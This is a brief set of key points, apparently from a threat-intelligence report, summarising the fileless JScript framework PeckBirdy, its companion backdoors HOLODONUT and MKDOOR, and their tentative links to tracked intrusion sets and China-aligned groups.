Keypoints
- PeckBirdy is built entirely in JScript and uses Windows Script Host to run fileless commands.
- Runtime code injection leaves almost no physical footprint, making detection difficult.
- HOLODONUT and MKDOOR are modular backdoors used with PeckBirdy to maintain persistence and exfiltrate data.
- Trend Micro linked PeckBirdy to SHADOW-VOID-044 (stolen code-signing certs, Cobalt Strike, CVE-2020-16040) and SHADOW-EARTH-045 (MSHTA and GitHub-hosted payloads).
- Investigators found tentative overlaps with suspected China-aligned groups such as Earth Lusca and Earth Baxia.